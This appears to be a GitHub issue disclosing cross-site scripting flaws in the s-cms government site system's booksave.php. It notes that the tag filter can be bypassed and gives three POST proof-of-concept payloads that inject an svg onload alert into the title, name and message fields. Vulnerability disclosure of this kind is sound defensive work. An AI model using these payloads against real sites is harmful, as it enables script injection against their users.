Skip to content

s-cms Multiple XSS exist in / function / booksave.php in Government station building system #2

@Str1am

Description

@Str1am

in / function / booksave.php,
1
2

只是简单得过滤了script,iframe,等标签,可以进行绕过
payload:http://127.0.0.1/CMS/scms//function/booksave.php
POST:G_title="><svg/onload=alert(1)>&G_mail=heelo@qq.com&G_phone=18888888888
a

POST:G_name="><svg/onload=alert(1)>&G_mail=heelo@qq.com&G_phone=18888888888

b

POST:G_msg="><svg/onload=alert(1)>&G_mail=heelo@qq.com&G_phone=18888888888

c

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions